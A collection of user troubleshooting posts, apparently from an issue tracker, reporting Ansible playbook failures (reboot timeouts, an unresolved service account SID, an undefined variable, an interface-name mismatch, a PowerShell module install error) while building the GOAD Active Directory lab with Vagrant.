fatal: [192.168.56.11]: FAILED! => {"changed": true, "elapsed": 630, "msg": "Timed out waiting for last boot time check (timeout=600.0)", "rebooted": true, "unreachable": false}
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: Exception: Timed out waiting for last boot time check (timeout=600.0)
fatal: [192.168.56.10]: FAILED! => {"changed": true, "elapsed": 637, "msg": "Timed out waiting for last boot time check (timeout=600.0)", "rebooted": true, "unreachable": false}
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: Exception: Timed out waiting for last boot time check (timeout=600.0)
fatal: [192.168.56.22]: FAILED! => {"changed": true, "elapsed": 648, "msg": "Timed out waiting for last boot time check (timeout=600.0)", "rebooted": true, "unreachable": false}
TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************
fatal: [192.168.56.23]: FAILED! => {"added": [], "changed": false, "msg": "Failed to translate the account 'essos.local\sql_svc' to a SID", "removed": []}
PLAY RECAP *************************************************************************************************************************************************************************
192.168.56.10 : ok=14 changed=8 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.11 : ok=14 changed=8 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.12 : ok=30 changed=19 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
192.168.56.22 : ok=13 changed=7 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.23 : ok=41 changed=21 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
Is there a simple command or process I can utilize to resolve this issue?
All the servers start up except DC01. When I start it, SRV03 is aborted. Is that a resource issue? I have 32GB memory and 1TB storage.
Thanks
I am using Windows and Ubuntu. With Vagrant I updated all machines, but my problem is when I used ansible-playbooks in Ubuntu
ansible [core 2.12.6]
(env) root@DESKTOP-I3MKVRC:/mnt/e/LabSources/vagrant/GOAD/ansible# ansible --version
[WARNING]: Ansible is being run in a world writable directory (/mnt/e/LabSources/vagrant/GOAD/ansible), ignoring it as an ansible.cfg source. For more
information see https://docs.ansible.com/ansible/devel/reference_appendices/config.html#cfg-in-world-writable-dir
ansible [core 2.12.6]
config file = /etc/ansible/ansible.cfg
configured module search path = ['/root/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
ansible python module location = /usr/local/lib/python3.8/dist-packages/ansible
ansible collection location = /root/.ansible/collections:/usr/share/ansible/collections
executable location = /usr/local/bin/ansible
python version = 3.8.0 (default, Dec 9 2021, 17:53:27) [GCC 8.4.0]
jinja version = 2.10
libyaml = False
(env) root@DESKTOP-I3MKVRC:/mnt/e/LabSources/vagrant/GOAD/ansible# ansible-playbook main.yml
[WARNING]: Ansible is being run in a world writable directory (/mnt/e/LabSources/vagrant/GOAD/ansible), ignoring it as an ansible.cfg source. For more
information see https://docs.ansible.com/ansible/devel/reference_appendices/config.html#cfg-in-world-writable-dir
[WARNING]: Could not match supplied host pattern, ignoring: dc01
[WARNING]: Could not match supplied host pattern, ignoring: dc02
[WARNING]: Could not match supplied host pattern, ignoring: dc03
[WARNING]: Could not match supplied host pattern, ignoring: srv01
[WARNING]: Could not match supplied host pattern, ignoring: srv02
[WARNING]: Could not match supplied host pattern, ignoring: srv03
PLAY [build all] ************************************************************************************************************************************************
skipping: no hosts matched
PLAY [build all no update] **************************************************************************************************************************************
skipping: no hosts matched
PLAY [Launch windows updates before continue] *******************************************************************************************************************
skipping: no hosts matched
PLAY [Read data files] ******************************************************************************************************************************************
TASK [Gathering Facts] ******************************************************************************************************************************************
ok: [192.168.0.108]
ok: [192.168.142.129]
ERROR! an undefined variable was found when attempting to template the vars_files item '{{data_path}}/config.json'
The error appears to be in '/mnt/e/LabSources/vagrant/GOAD/ansible/data.yml': line 6, column 7, but may
be elsewhere in the file depending on the exact syntax problem.
The offending line appears to be:
vars_files:
- "{{data_path}}/config.json"
^ here
We could be wrong, but this one looks like it might be an issue with
missing quotes. Always quote template expression brackets when they
start a value. For instance:
with_items:
- {{ foo }}
Should be written as:
with_items:
- "{{ foo }}"
Hello,
when running the ansible-playbook main.yml, the script runs into the following issue:
TASK [child_domain : disable interface Ethernet before join domain] *******************************************************
fatal: [172.18.100.11]: FAILED! => {"changed": true, "cmd": "netsh interface set interface \"Ethernet\" disable", "delta": "0:00:00.906198", "end": "2022-07-22 06:32:15.861635", "msg": "non-zero return code", "rc": 1, "start": "2022-07-22 06:32:14.955437", "stderr": "", "stderr_lines": [], "stdout": "No more data is available.\r\n\r\n\r\n", "stdout_lines": ["No more data is available.", "", ""]}
From my first look at the issue, this appears to be caused by the fact that the standard network interface in Server 2019 is called "Ethernet0" instead of "Ethernet".
The server itself is reachable though.
Any help would be appreciated.
When porting to VMware I discovered a missing var:
adapter_names: 'Ethernet 2' # -> adapter_names: "{{domain_adapter}}"
affected files:
TASK [common : Windows | Check for ComputerManagementDsc Powershell module] ***********************************************************************************************************************************************************************************************************************************************
fatal: [192.168.56.12]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.23]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.10]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.11]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
It is like community.windows galaxy doesn't work as expected.
I have installed this module on dc1 and got this after:
If someone can help me get past this error, thanks in advance.